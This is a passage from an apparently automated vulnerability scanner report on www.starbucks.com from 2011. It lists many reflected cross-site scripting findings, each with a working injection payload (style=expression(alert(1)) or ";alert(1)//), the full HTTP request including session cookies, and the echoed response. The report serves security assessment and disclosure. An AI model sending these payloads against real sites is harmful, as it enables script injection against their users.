The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be1ba"style%3d"x%3aexpression(alert(1))"2e68e935a83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as be1ba"style="x:expression(alert(1))"2e68e935a83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee?be1ba"style%3d"x%3aexpression(alert(1))"2e68e935a83=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:09:15 GMT
Connection: close
Content-Length: 56088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee?be1ba"style="x:expression(alert(1))"2e68e935a83=1" />
...[SNIP]...

2.24. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25c37"%3balert(1)//2d0969caa59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 25c37";alert(1)//2d0969caa59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee?25c37"%3balert(1)//2d0969caa59=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:09:19 GMT
Connection: close
Content-Length: 55993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
type="text/javascript">
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "89759525001";
   flashvars.playerLocation = "http://www.starbucks.com/coffee?25c37";alert(1)//2d0969caa59=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.25. http://www.starbucks.com/coffee/learn [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14736"style%3d"x%3aexpression(alert(1))"c3b68698284 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 14736"style="x:expression(alert(1))"c3b68698284 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/learn?14736"style%3d"x%3aexpression(alert(1))"c3b68698284=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:20:36 GMT
Connection: close
Content-Length: 37684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/learn?14736"style="x:expression(alert(1))"c3b68698284=1" />
...[SNIP]...

2.26. http://www.starbucks.com/coffee/learn/clover [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn/clover

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29816"style%3d"x%3aexpression(alert(1))"6d1aa7d73d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29816"style="x:expression(alert(1))"6d1aa7d73d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/learn/clover?29816"style%3d"x%3aexpression(alert(1))"6d1aa7d73d1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:20:45 GMT
Connection: close
Content-Length: 39129

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/learn/clover?29816"style="x:expression(alert(1))"6d1aa7d73d1=1" />
...[SNIP]...

2.27. http://www.starbucks.com/coffee/learn/flavors-in-your-cup [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn/flavors-in-your-cup

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70f3b"style%3d"x%3aexpression(alert(1))"df67647ac4c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 70f3b"style="x:expression(alert(1))"df67647ac4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/learn/flavors-in-your-cup?70f3b"style%3d"x%3aexpression(alert(1))"df67647ac4c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:20:57 GMT
Connection: close
Content-Length: 43949

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/learn/flavors-in-your-cup?70f3b"style="x:expression(alert(1))"df67647ac4c=1" />
...[SNIP]...

2.28. http://www.starbucks.com/coffee/starbucks-natural-fusions [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1318e"style%3d"x%3aexpression(alert(1))"b348d971bc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1318e"style="x:expression(alert(1))"b348d971bc6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions?1318e"style%3d"x%3aexpression(alert(1))"b348d971bc6=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:18:27 GMT
Connection: close
Content-Length: 50682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions?1318e"style="x:expression(alert(1))"b348d971bc6=1" />
...[SNIP]...

2.29. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/caramel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db288"style%3d"x%3aexpression(alert(1))"ffbed84d709 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as db288"style="x:expression(alert(1))"ffbed84d709 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions/caramel?db288"style%3d"x%3aexpression(alert(1))"ffbed84d709=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:19:45 GMT
Connection: close
Content-Length: 41422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel?db288"style="x:expression(alert(1))"ffbed84d709=1" />
...[SNIP]...

2.30. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/cinnamon

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68e89"style%3d"x%3aexpression(alert(1))"ef92fe52f9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68e89"style="x:expression(alert(1))"ef92fe52f9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions/cinnamon?68e89"style%3d"x%3aexpression(alert(1))"ef92fe52f9f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:20:24 GMT
Connection: close
Content-Length: 41464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon?68e89"style="x:expression(alert(1))"ef92fe52f9f=1" />
...[SNIP]...

2.31. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/savoring

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4203"style%3d"x%3aexpression(alert(1))"93ec1632d62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d4203"style="x:expression(alert(1))"93ec1632d62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions/savoring?d4203"style%3d"x%3aexpression(alert(1))"93ec1632d62=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:20:25 GMT
Connection: close
Content-Length: 40201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring?d4203"style="x:expression(alert(1))"93ec1632d62=1" />
...[SNIP]...

2.32. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/vanilla

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fd5c"style%3d"x%3aexpression(alert(1))"93089c0b9ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4fd5c"style="x:expression(alert(1))"93089c0b9ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions/vanilla?4fd5c"style%3d"x%3aexpression(alert(1))"93089c0b9ff=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:19:06 GMT
Connection: close
Content-Length: 41391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla?4fd5c"style="x:expression(alert(1))"93089c0b9ff=1" />
...[SNIP]...

2.33. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d779"style%3d"x%3aexpression(alert(1))"13c0978d7ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2d779"style="x:expression(alert(1))"13c0978d7ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee?2d779"style%3d"x%3aexpression(alert(1))"13c0978d7ed=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:24 GMT
Connection: close
Content-Length: 56951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee?2d779"style="x:expression(alert(1))"13c0978d7ed=1" />
...[SNIP]...

2.34. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48c38"style%3d"x%3aexpression(alert(1))"f99dc12b612 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 48c38"style="x:expression(alert(1))"f99dc12b612 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?48c38"style%3d"x%3aexpression(alert(1))"f99dc12b612=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:42 GMT
Connection: close
Content-Length: 42379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?48c38"style="x:expression(alert(1))"f99dc12b612=1" />
...[SNIP]...

2.35. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76daa"%3balert(1)//724980535d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 76daa";alert(1)//724980535d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?76daa"%3balert(1)//724980535d7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:44 GMT
Connection: close
Content-Length: 42284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
shvars.playerType = "reserve";
       flashvars.playlistID = "624827690001";
       flashvars.playerLocation = "http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?76daa";alert(1)//724980535d7=1";
       var params = {};
       params.loop = "false";
       params.quality = "best";
       params.scale = "exactfit";
       params.wmode = "transparent";
       params.allowscriptaccess = "always";
       params.allownetw
...[SNIP]...

2.36. http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcf0f"style%3d"x%3aexpression(alert(1))"ad29da1d3f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bcf0f"style="x:expression(alert(1))"ad29da1d3f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia?bcf0f"style%3d"x%3aexpression(alert(1))"ad29da1d3f1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:18:01 GMT
Connection: close
Content-Length: 41036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia?bcf0f"style="x:expression(alert(1))"ad29da1d3f1=1" />
...[SNIP]...

2.37. http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia

Issue detail

